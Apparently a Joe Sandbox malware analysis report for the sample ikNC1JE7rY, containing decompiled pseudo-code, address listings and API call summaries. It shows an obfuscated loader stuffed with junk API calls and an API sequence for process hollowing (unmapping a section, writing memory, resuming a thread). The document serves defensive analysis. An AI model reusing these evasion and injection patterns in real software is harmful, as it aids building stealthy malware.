                        						 *((intOrPtr*)(_t855 - 0x38)) =  *((intOrPtr*)(_t855 - 0x38)) - 0x17ce5752;
                        						 *((intOrPtr*)(_t855 - 0x4c)) =  *((intOrPtr*)(_t855 - 0x4c)) - 0x4821aa3d;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x3a3f3a40;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x1de8200;
                        						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) + 0x6c325c08;
                        						 *((intOrPtr*)(_t855 - 0x34)) =  *((intOrPtr*)(_t855 - 0x34)) + 0x60a345da;
                        						 *((intOrPtr*)(_t855 - 0x5c)) =  *((intOrPtr*)(_t855 - 0x5c)) - 0xc11cad6;
                        						 *((intOrPtr*)(_t855 - 0x88)) =  *((intOrPtr*)(_t855 - 0x88)) - 0x24391f5c;
                        						 *((intOrPtr*)(_t855 + 0x44)) =  *((intOrPtr*)(_t855 + 0x44)) - 0x7643ad89;
                        						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) - 0x21db0587;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x6c6ae23;
                        						 *((intOrPtr*)(_t855 - 0x80)) =  *((intOrPtr*)(_t855 - 0x80)) - 0x17d6899a;
                        						 *((intOrPtr*)(_t855 - 0x34)) =  *((intOrPtr*)(_t855 - 0x34)) + 0x4749c337;
                        						 *((intOrPtr*)(_t855 - 0x4c)) =  *((intOrPtr*)(_t855 - 0x4c)) + 0x4dd6c6ef;
                        						 *((intOrPtr*)(_t855 + 0x14)) =  *((intOrPtr*)(_t855 + 0x14)) + 0x402e7a02;
                        						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) + 0x4d6aa82;
                        						_t799 = 0x74d17c3e *  *(_t855 + 0x6c) >> 0x20;
                        						__imp__GetProcessHandleCount(0, 0); // executed
                        					}
                        					GetSystemDefaultLCID();
                        					if(_t845 > 0x12a82b5) {
                        						break;
                        					}
                        					_t845 = _t845 + 1;
                        					if(_t845 < 0x17c462e4) {
                        						continue;
                        					}
                        					break;
                        				}
                        				_t865 =  *0x42e644 - 0x16;
                        				if( *0x42e644 == 0x16) {
                        					GetVersionExW(0);
                        					GetComputerNameA(_t855 - 0x4c4, _t855 - 0x90);
                        					GlobalWire(_t855 - 0xf14);
                        					ResetEvent(0);
                        					OpenWaitableTimerA(0, 0, "padumojerupodivufojonabahusemufikeserivifaleb");
                        					FindNextFileW(0, _t855 - 0x714);
                        					 *((intOrPtr*)(_t855 - 0xac)) = 0xf;
                        					E004058A2(_t855 - 0xc4, 0);
                        					 *(_t855 - 4) = 0;
                        					E0040753F(_t783, 0, "0.txt", "rb");
                        					E00407447(0);
                        					_pop(_t797);
                        					_t643 = _t858;
                        					 *_t643 = 0;
                        					 *((intOrPtr*)(_t643 + 4)) = 0;
                        					E0040556F(_t883);
                        					st0 = _t883;
                        					_t645 = _t858;
                        					 *_t645 = 0;
                        					 *((intOrPtr*)(_t645 + 4)) = 0;
                        					E0040554C(_t883, _t797, _t797);
                        					st0 = _t883;
                        					E004072E8(_t783, _t799, 1, 0, _t865);
                        					_t648 = _t858;
                        					 *_t648 = 0;
                        					 *((intOrPtr*)(_t648 + 4)) = 0;
                        					E00405529(_t883, _t797, 0);
                        					st0 = _t883;
                        					 *(_t855 - 4) =  *(_t855 - 4) | 0xffffffff;
                        					E004058C7(_t855 - 0xc4, 1, _t855, 1, 0);
                        				}
                        				_t867 =  *0x42e644 - 0xc;
                        				if( *0x42e644 == 0xc) {
                        					__imp__OleQueryCreateFromData();
                        					__imp__WinHttpCloseHandle();
                        					FoldStringW(0, L"miputuwudukabocayuvehom", 0, _t855 - 0xf14, 0);
                        					E00407447(0);
                        					E004072A3(0, 0);
                        					_t623 = _t858;
                        					 *_t623 = 0;
                        					 *((intOrPtr*)(_t623 + 4)) = 0;
                        					E00405529(_t883, 0, 0);
                        					st0 = _t883;
                        					_push(0);
                        					_push(0);
                        					E00407187(_t783, _t799, 1, 0, _t867);
                        					E004059C4(_t855 - 0xc0);
                        					 *(_t855 - 4) = 1;
                        					E00405931(_t855 - 0x94,  *((intOrPtr*)(_t855 - 0xb4)), _t855 - 0xc0);
                        					 *(_t855 - 4) =  *(_t855 - 4) | 0xffffffff;
                        					E00405A3C(_t855 - 0xc0);
                        				}
                        				_t848 = 0;
                        				_t869 =  *0x42e644; // 0xf790
                        				if(_t869 > 0) {
                        					do {
                        						_t613 =  *0x42e648; // 0x36a035
                        						 *((intOrPtr*)(_t855 + 0x74)) = _t613;
                        						 *((intOrPtr*)(_t855 + 0x74)) =  *((intOrPtr*)(_t855 + 0x74)) + 0xb2d3b;
                        						_t788 =  *0x42dc24; // 0x62f9dc
                        						 *((char*)(_t848 + _t788)) =  *((intOrPtr*)( *((intOrPtr*)(_t855 + 0x74)) + _t848));
                        						if( *0x42e644 == 0x44) {
                        							__imp__GetLongPathNameA(0, _t855 - 0x4c4, 0);
                        							CreateMutexA(0, 0, 0);
                        						}
                        						_t848 = _t848 + 1;
                        						_t871 = _t848 -  *0x42e644; // 0xf790
                        					} while (_t871 < 0);
                        				}
                        				_t849 = 0;
                        				do {
                        					_t600 =  *0x42e644; // 0xf790
                        					if(_t600 + _t849 == 0x5e) {
                        						SetConsoleCtrlHandler(0, 0);
                        						AddAtomW(L"Nalid cinunec");
                        						lstrcpynA(_t855 - 0x4c4, 0, 0);
                        						__imp__SetFileShortNameW(0, L"bawum");
                        					}
                        					_t849 = _t849 + 1;
                        				} while (_t849 < 0x40c893);
                        				_t800 =  *0x42e644; // 0xf790
                        				_t785 =  *0x42dc24; // 0x62f9dc
                        				E0040573C(_t785, _t800, 0x419008);
                        				_t603 = 0;
                        				do {
                        					if(_t603 == 0x770e) {
                        						 *((intOrPtr*)(_t855 + 0x74)) = 0;
                        						 *((intOrPtr*)(_t855 + 0x74)) =  *((intOrPtr*)(_t855 + 0x74)) + 0x3afc;
                        						 *0x42dc24 =  *0x42dc24 +  *((intOrPtr*)(_t855 + 0x74));
                        					}
                        					_t603 = _t603 + 1;
                        				} while (_t603 < 0x286b97d);
                        				_t850 = 0x7b;
                        				do {
                        					if( *0x42e644 == 0xd) {
                        						GetFileType(0);
                        						FindFirstChangeNotificationW(0, 0, 0);
                        					}
                        					if( *0x42e644 == 0xf) {
                        						__imp__GetConsoleAliasW(0, _t855 - 0x1714, 0, 0);
                        						GetUserDefaultLangID();
                        					}
                        					_t850 = _t850 - 1;
                        				} while (_t850 != 0);
                        				_t608 = LoadLibraryA("msimg32.dll"); // executed
                        				 *[fs:0x0] =  *((intOrPtr*)(_t855 - 0xc));
                        				return _t608;
                        			}































                        0x00405a6b
                        0x00405a6c
                        0x00405a74
                        0x00405a7e
                        0x00405a93
                        0x00405a98
                        0x00405aaa
                        0x00405ab0
                        0x00405ab6
                        0x00405ab8
                        0x00405ab8
                        0x00405ac4
                        0x00405aca
                        0x00405ad1
                        0x00405adb
                        0x00405ae2
                        0x00405ae9
                        0x00405af0
                        0x00405afa
                        0x00405b04
                        0x00405b0b
                        0x00405b12
                        0x00405b19
                        0x00405b20
                        0x00405b27
                        0x00405b2e
                        0x00405b35
                        0x00405b3f
                        0x00405b46
                        0x00405b4d
                        0x00405b54
                        0x00405b5b
                        0x00405b62
                        0x00405b6c
                        0x00405b73
                        0x00405b7a
                        0x00405b81
                        0x00405b88
                        0x00405b8f
                        0x00405b96
                        0x00405ba0
                        0x00405ba7
                        0x00405bae
                        0x00405bb5
                        0x00405bbc
                        0x00405bc6
                        0x00405bcd
                        0x00405bd4
                        0x00405bdb
                        0x00405be2
                        0x00405be9
                        0x00405bf0
                        0x00405bf7
                        0x00405bfe
                        0x00405c05
                        0x00405c0c
                        0x00405c16
                        0x00405c1d
                        0x00405c24
                        0x00405c2b
                        0x00405c35
                        0x00405c3c
                        0x00405c43
                        0x00405c4a
                        0x00405c51
                        0x00405c58
                        0x00405c5f
                        0x00405c66
                        0x00405c6d
                        0x00405c74
                        0x00405c7b
                        0x00405c82
                        0x00405c89
                        0x00405c90
                        0x00405c97
                        0x00405c9e
                        0x00405ca5
                        0x00405cac
                        0x00405cb3
                        0x00405cba
                        0x00405cc1
                        0x00405cde
                        0x00405cf0
                        0x00405cf7
                        0x00405d09
                        0x00405d21
                        0x00405d2b
                        0x00405d35
                        0x00405d3f
                        0x00405d62
                        0x00405d69
                        0x00405d7b
                        0x00405d85
                        0x00405d8f
                        0x00405db2
                        0x00405dbc
                        0x00405dc3
                        0x00405dd5
                        0x00405ddc
                        0x00405dee
                        0x00405df8
                        0x00405dff
                        0x00405e06
                        0x00405e34
                        0x00405e3e
                        0x00405e56
                        0x00405e5d
                        0x00405e7a
                        0x00405e81
                        0x00405e93
                        0x00405e9a
                        0x00405ea1
                        0x00405eb3
                        0x00405ebd
                        0x00405eeb
                        0x00405ef5
                        0x00405efc
                        0x00405f06
                        0x00405f0d
                        0x00405f14
                        0x00405f26
                        0x00405f30
                        0x00405f48
                        0x00405f4f
                        0x00405f56
                        0x00405f5d
                        0x00405f67
                        0x00405f6e
                        0x00405f78
                        0x00405f82
                        0x00405f89
                        0x00405f90
                        0x00405f97
                        0x00405f9e
                        0x00405fa8
                        0x00405faf
                        0x00405fb6
                        0x00405fd6
                        0x00405fdd
                        0x00405fe4
                        0x00405feb
                        0x00405ff2
                        0x00405ffc
                        0x00406003
                        0x0040600a
                        0x00406027
                        0x0040602e
                        0x00406040
                        0x00406047
                        0x00406051
                        0x00406058
                        0x00406075
                        0x0040607c
                        0x0040608e
                        0x00406095
                        0x0040609c
                        0x004060a6
                        0x004060b0
                        0x004060b7
                        0x004060c9
                        0x004060d3
                        0x004060da
                        0x004060fa
                        0x00406104
                        0x00406132
                        0x00406139
                        0x00406140
                        0x00406152
                        0x0040617f
                        0x00406187
                        0x00406187
                        0x0040618d
                        0x00406199
                        0x00000000
                        0x00000000
                        0x0040619b
                        0x004061a2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061a2
                        0x004061ab
                        0x004061b2
                        0x004061b9
                        0x004061cd
                        0x004061da
                        0x004061e1
                        0x004061ee
                        0x004061fc
                        0x00406209
                        0x00406213
                        0x00406223
                        0x00406226
                        0x0040622c
                        0x00406232
                        0x00406233
                        0x00406235
                        0x00406237
                        0x0040623a
                        0x0040623f
                        0x00406243
                        0x00406245
                        0x00406247
                        0x0040624a
                        0x0040624f
                        0x00406252
                        0x00406258
                        0x0040625a
                        0x0040625c
                        0x0040625f
                        0x00406264
                        0x00406266
                        0x00406272
                        0x00406272
                        0x00406277
                        0x0040627e
                        0x00406281
                        0x00406288
                        0x0040629d
                        0x004062a4
                        0x004062ab
                        0x004062b1
                        0x004062b3
                        0x004062b5
                        0x004062b8
                        0x004062bd
                        0x004062bf
                        0x004062c0
                        0x004062c1
                        0x004062ce
                        0x004062e6
                        0x004062e9
                        0x004062ee
                        0x004062f8
                        0x004062f8
                        0x004062fd
                        0x004062ff
                        0x00406305
                        0x00406307
                        0x00406307
                        0x0040630c
                        0x00406314
                        0x0040631d
                        0x00406323
                        0x0040632d
                        0x00406338
                        0x00406341
                        0x00406341
                        0x00406347
                        0x00406348
                        0x00406348
                        0x00406307
                        0x00406350
                        0x00406352
                        0x00406352
                        0x0040635c
                        0x00406360
                        0x0040636b
                        0x0040637a
                        0x00406386
                        0x00406386
                        0x0040638c
                        0x0040638d
                        0x00406395
                        0x0040639b
                        0x004063a6
                        0x004063ab
                        0x004063ad
                        0x004063b2
                        0x004063b4
                        0x004063b7
                        0x004063c1
                        0x004063c1
                        0x004063c7
                        0x004063c8
                        0x004063d1
                        0x004063d2
                        0x004063d9
                        0x004063dc
                        0x004063e5
                        0x004063e5
                        0x004063f2
                        0x004063fe
                        0x00406404
                        0x00406404
                        0x0040640a
                        0x0040640a
                        0x00406412
                        0x0040641c
                        0x00406428

                        APIs
                        • __EH_prolog.LIBCMT ref: 00405A74
                        • GlobalAlloc.KERNELBASE(00000000), ref: 00405A98
                        • VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 00405AB0
                        • GetLastError.KERNEL32 ref: 00405AB8
                        • GetProcessHandleCount.KERNELBASE(00000000,00000000,3686B744,274F0A8C,4AF4EDD1,4DD6C6EF,3A3F3A40,708C25B4,59D10E2F,36D67E57,3289BE56,4821AA3D,3A3F3A40,626E8506,626E8506,42D3B3FD), ref: 00406187
                          • Part of subcall function 00405A3C: __EH_prolog.LIBCMT ref: 00405A41
                        • GetSystemDefaultLCID.KERNEL32 ref: 0040618D
                        • GetVersionExW.KERNEL32(00000000), ref: 004061B9
                        • GetComputerNameA.KERNEL32(?,?), ref: 004061CD
                        • GlobalWire.KERNEL32 ref: 004061DA
                        • ResetEvent.KERNEL32(00000000), ref: 004061E1
                        • OpenWaitableTimerA.KERNEL32(00000000,00000000,padumojerupodivufojonabahusemufikeserivifaleb), ref: 004061EE
                        • FindNextFileW.KERNEL32(00000000,?), ref: 004061FC
                        • __wfopen_s.LIBCMT ref: 00406226
                        • _feof.LIBCMT ref: 0040622C
                        • _puts.LIBCMT ref: 00406252
                        • OleQueryCreateFromData.OLE32(00000000), ref: 00406281
                        • WinHttpCloseHandle.WINHTTP(00000000), ref: 00406288
                        • FoldStringW.KERNEL32(00000000,miputuwudukabocayuvehom,00000000,?,00000000), ref: 0040629D
                        • _feof.LIBCMT ref: 004062A4
                        • _fsetpos.LIBCMT ref: 004062AB
                        • _fprintf.LIBCMT ref: 004062C1
                        • GetLongPathNameA.KERNEL32 ref: 00406338
                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00406341
                        • SetConsoleCtrlHandler.KERNEL32(00000000,00000000), ref: 00406360
                        • AddAtomW.KERNEL32(Nalid cinunec), ref: 0040636B
                        • lstrcpynA.KERNEL32(?,00000000,00000000), ref: 0040637A
                        • SetFileShortNameW.KERNEL32(00000000,bawum), ref: 00406386
                        • GetFileType.KERNEL32(00000000), ref: 004063DC
                        • FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004063E5
                        • GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 004063FE
                        • GetUserDefaultLangID.KERNEL32 ref: 00406404
                        • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00406412
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: FileName$ConsoleCreateDefaultFindGlobalH_prologHandle_feof$AliasAllocAtomChangeCloseComputerCountCtrlDataErrorEventFirstFoldFromHandlerHttpLangLastLibraryLoadLongMutexNextNotificationOpenPathProcessProtectQueryResetShortStringSystemTimerTypeUserVersionVirtualWaitableWire__wfopen_s_fprintf_fsetpos_putslstrcpyn
                        • String ID: lJ$&v1>$/,cZ$0.txt$@:?:$Cah$Nalid cinunec$Tgt$bawum$j[aj$kq`E$miputuwudukabocayuvehom$msimg32.dll$padumojerupodivufojonabahusemufikeserivifaleb
                        • API String ID: 1493176409-4139528676
                        • Opcode ID: 6da46279e15f9b1820cb361b9289847db53e4abe8cb06125514456919f854b0b
                        • Instruction ID: bb73222b721ae5790bf0f43ae7b398a59fbe0ad7c8ad8c6f35e93601ff7b34d9
                        • Opcode Fuzzy Hash: 6da46279e15f9b1820cb361b9289847db53e4abe8cb06125514456919f854b0b
                        • Instruction Fuzzy Hash: 6F428AB5A01358DFCB24CFAADA896CEBBB4FF15354F504059F949AB610C7348A81CF89
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00520156
                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0052016C
                        • CreateProcessA.KERNELBASE(?,00000000), ref: 00520255
                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00520270
                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00520283
                        • GetThreadContext.KERNELBASE(00000000,?), ref: 0052029F
                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 005202C8
                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 005202E3
                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00520304
                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0052032A
                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00520399
                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 005203BF
                        • SetThreadContext.KERNELBASE(00000000,?), ref: 005203E1
                        • ResumeThread.KERNELBASE(00000000), ref: 005203ED
                        • ExitProcess.KERNEL32(00000000), ref: 00520412
                        Memory Dump Source
                        • Source File: 00000000.00000002.318494291.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_520000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                        • String ID:
                        • API String ID: 2875986403-0
                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                        • Instruction ID: 16fb0d98dd878bbeeb9d7cb7a005029b67ea85e08b6f0721781d66b2b73a87fd
                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                        • Instruction Fuzzy Hash: 5EB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 77 520420-5204f8 79 5204fa 77->79 80 5204ff-52053c CreateWindowExA 77->80 81 5205aa-5205ad 79->81 82 520540-520558 PostMessageA 80->82 83 52053e 80->83 84 52055f-520563 82->84 83->81 84->81 85 520565-520579 84->85 85->81 87 52057b-520582 85->87 88 520584-520588 87->88 89 5205a8 87->89 88->89 90 52058a-520591 88->90 89->84 90->89 91 520593-520597 call 520110 90->91 93 52059c-5205a5 91->93 93->89
                        APIs
                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00520533
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318494291.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_520000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                        • API String ID: 716092398-2341455598
                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                        • Instruction ID: 86d41963ede0ad6dd6a04df42b1a8a11e8183a0b0678abafadcb9ca2c5ff6471
                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                        • Instruction Fuzzy Hash: BF511A70E08398DAEB11CBD8D849BDDBFB2AF11708F144058E5447F2C6C3BA5658CBA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 94 5205b0-5205d5 95 5205dc-5205e0 94->95 96 5205e2-5205f5 GetFileAttributesA 95->96 97 52061e-520621 95->97 98 520613-52061c 96->98 99 5205f7-5205fe 96->99 98->95 99->98 100 520600-52060b call 520420 99->100 102 520610 100->102 102->98
                        APIs
                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 005205EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.318494291.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_520000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID: apfHQ$o
                        • API String ID: 3188754299-2999369273
                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                        • Instruction ID: 4942de725a6f44557a78a72e2acb9c8e3838b4480259882d8f0a91ab4d590745
                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                        • Instruction Fuzzy Hash: 44012170C0525CEEDF10DB98D5583AEBFB5AF41308F1480D9C4092B382D7B69B59CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 103 40d805-40d827 HeapCreate 104 40d829-40d82a 103->104 105 40d82b-40d834 103->105
                        C-Code - Quality: 100%
                        			E0040D805(intOrPtr _a4) {
                        				void* _t6;
                        
                        				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                        				 *0x42eb04 = _t6;
                        				if(_t6 != 0) {
                        					 *0x42f134 = 1;
                        					return 1;
                        				} else {
                        					return _t6;
                        				}
                        			}




                        0x0040d81a
                        0x0040d820
                        0x0040d827
                        0x0040d82e
                        0x0040d834
                        0x0040d82a
                        0x0040d82a
                        0x0040d82a

                        APIs
                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D81A
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: CreateHeap
                        • String ID:
                        • API String ID: 10892065-0
                        • Opcode ID: 78e0852fdfc83d9da911a7fd24932acf738f4a1c18274fab87f3f58ae44aeb3f
                        • Instruction ID: fd85ce2fcb67921a389e6ce4cb0a7bbe92cde3a7c9e0599c9ee6dbe1732e0889
                        • Opcode Fuzzy Hash: 78e0852fdfc83d9da911a7fd24932acf738f4a1c18274fab87f3f58ae44aeb3f
                        • Instruction Fuzzy Hash: BAD0A732A513049FDB10AFB1BD097323BDCD3847A5F408436B90DD61A0F574ED52C648
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 106 409d17-409d19 call 409ca5 108 409d1e-409d1f 106->108
                        C-Code - Quality: 100%
                        			E00409D17() {
                        				void* _t1;
                        
                        				_t1 = E00409CA5(0); // executed
                        				return _t1;
                        			}




                        0x00409d19
                        0x00409d1f

                        APIs
                        • __encode_pointer.LIBCMT ref: 00409D19
                          • Part of subcall function 00409CA5: TlsGetValue.KERNEL32(00000000,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409CB7
                          • Part of subcall function 00409CA5: TlsGetValue.KERNEL32(00000004,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409CCE
                          • Part of subcall function 00409CA5: RtlEncodePointer.NTDLL(00000000,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409D0C
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: Value$EncodePointer__encode_pointer
                        • String ID:
                        • API String ID: 2585649348-0
                        • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                        • Instruction ID: a16bc2a155c058482eeeff35459f6d4b366902e2d4f8f65c91ebe27a5e0a607d
                        • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E004077DB(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                        				intOrPtr _v0;
                        				void* _v804;
                        				intOrPtr _v808;
                        				intOrPtr _v812;
                        				intOrPtr _t6;
                        				intOrPtr _t11;
                        				intOrPtr _t12;
                        				intOrPtr _t13;
                        				long _t17;
                        				intOrPtr _t21;
                        				intOrPtr _t22;
                        				intOrPtr _t25;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				intOrPtr* _t31;
                        				void* _t34;
                        
                        				_t27 = __esi;
                        				_t26 = __edi;
                        				_t25 = __edx;
                        				_t22 = __ecx;
                        				_t21 = __ebx;
                        				_t6 = __eax;
                        				_t34 = _t22 -  *0x42c770; // 0xa0fc40c5
                        				if(_t34 == 0) {
                        					asm("repe ret");
                        				}
                        				 *0x42ec10 = _t6;
                        				 *0x42ec0c = _t22;
                        				 *0x42ec08 = _t25;
                        				 *0x42ec04 = _t21;
                        				 *0x42ec00 = _t27;
                        				 *0x42ebfc = _t26;
                        				 *0x42ec28 = ss;
                        				 *0x42ec1c = cs;
                        				 *0x42ebf8 = ds;
                        				 *0x42ebf4 = es;
                        				 *0x42ebf0 = fs;
                        				 *0x42ebec = gs;
                        				asm("pushfd");
                        				_pop( *0x42ec20);
                        				 *0x42ec14 =  *_t31;
                        				 *0x42ec18 = _v0;
                        				 *0x42ec24 =  &_a4;
                        				 *0x42eb60 = 0x10001;
                        				_t11 =  *0x42ec18; // 0x0
                        				 *0x42eb14 = _t11;
                        				 *0x42eb08 = 0xc0000409;
                        				 *0x42eb0c = 1;
                        				_t12 =  *0x42c770; // 0xa0fc40c5
                        				_v812 = _t12;
                        				_t13 =  *0x42c774; // 0x5f03bf3a
                        				_v808 = _t13;
                        				 *0x42eb58 = IsDebuggerPresent();
                        				_push(1);
                        				E00409C9D(_t14);
                        				SetUnhandledExceptionFilter(0);
                        				_t17 = UnhandledExceptionFilter(0x402814);
                        				if( *0x42eb58 == 0) {
                        					_push(1);
                        					E00409C9D(_t17);
                        				}
                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                        			}



















                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077db
                        0x004077e1
                        0x004077e3
                        0x004077e3
                        0x0040d8d6
                        0x0040d8db
                        0x0040d8e1
                        0x0040d8e7
                        0x0040d8ed
                        0x0040d8f3
                        0x0040d8f9
                        0x0040d900
                        0x0040d907
                        0x0040d90e
                        0x0040d915
                        0x0040d91c
                        0x0040d923
                        0x0040d924
                        0x0040d92d
                        0x0040d935
                        0x0040d93d
                        0x0040d948
                        0x0040d952
                        0x0040d957
                        0x0040d95c
                        0x0040d966
                        0x0040d970
                        0x0040d975
                        0x0040d97b
                        0x0040d980
                        0x0040d98c
                        0x0040d991
                        0x0040d993
                        0x0040d99b
                        0x0040d9a6
                        0x0040d9b3
                        0x0040d9b5
                        0x0040d9b7
                        0x0040d9bc
                        0x0040d9d0

                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 0040D986
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D99B
                        • UnhandledExceptionFilter.KERNEL32(00402814), ref: 0040D9A6
                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D9C2
                        • TerminateProcess.KERNEL32(00000000), ref: 0040D9C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
